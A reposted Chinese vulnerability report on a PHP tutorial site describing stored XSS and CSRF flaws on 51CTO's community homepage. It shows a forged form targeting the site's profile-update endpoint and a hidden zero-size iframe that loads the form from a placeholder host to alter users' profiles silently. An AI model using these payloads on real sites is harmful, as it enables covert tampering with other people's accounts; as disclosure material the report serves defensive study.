来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] XSS:51CTO圈子主页再次XSS上次我发的是自定义模块标题处 这次是内容处``(居然不自己排查下其他地方)看图html代码成功注入CSRF:在个人信息各处 除了修改邮箱地址和密码 其他均可用CSRF攻击...
XSS: 51CTO圈子主页再次XSS 上次我发的是"自定义模块"标题处 这次是内容处``(居然不自己排查下其他地方) 看图
CSRF:
在个人信息各处 除了修改邮箱地址和密码 其他均可用CSRF攻击 为了方便演示 我就用了 姓名 来测试 <form action="http://home.51cto.com//index.php?s=/Info/doIndex" method="post" class="form_validator" id="regform">
在上处提过的自定义模块内容处插入这些代码 就能成功修改用户的个人任何信息 就这样贴上去的话 页面会显示"修改成功!"为了让CSRF攻击更隐蔽 我们可以用到<iframe>标签 把表单保存为html 上传到一个网站上 在自定义模块内容处插入: <iframe width=0 height=0 src=http://xxx.com/1.html>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com